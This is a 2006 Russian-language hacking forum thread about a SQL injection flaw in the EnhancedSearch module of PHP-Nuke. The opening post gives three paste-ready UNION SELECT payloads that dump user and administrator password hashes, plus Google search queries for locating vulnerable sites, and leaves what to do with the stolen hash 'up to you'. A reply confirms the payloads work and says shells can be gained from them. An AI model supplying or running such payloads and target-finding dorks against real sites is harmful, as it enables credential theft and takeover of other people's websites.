Форумы phpnuke SQL Inj ALL VERSIONS

Discussion in 'Уязвимости CMS/форумов' started by LoFFi, 12 May 2006.

  1. LoFFi

    LoFFi Elder - Старейшина

    Joined:
    21 Feb 2006
    Messages:
    194
    Likes Received:
    90
    Reputations:
    85
    Бага найдена в модуле поиска (EnhancedSearch).

    Ввести в поиске :
    EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

    EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*

    EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

    И получим хеш админа.
    А что с ним делать, это уже ваше дело :))))


    Небольшие запросы для гугла :))
    "Enhanced Search Version 2.0: Powered by"

    inurl:"modules.php?name=EnhancedSearch"


    Источник : security.nnov.ru
     
  2. _link

    _link New Member

    Joined:
    28 Feb 2006
    Messages:
    26
    Likes Received:
    1
    Reputations:
    0
    Все верно, все работает. Дает хэши админа и других юзеров.
    На этом можно туеву хучу шеллов поднять.
     
  3. syntacsis

    syntacsis Elder - Старейшина

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    LoFFi, наверно хорошо, что скинул. Может кому пригодится. Но нюку лучше на месте смотреть. Скрипткиддинг такой только на самых запущенных движках проходит.
    Кстати, эта бага кажись в середине апреля была в nnov опубликована. Известна стала широкому кругу (ну тем, кто нюкой занимается) пораньше. Много с неё сложно поймать.
    http://www.lock-team.ru/news/world_news/38.html (это далеко не первоисточник, просто первое что по запросу вышло)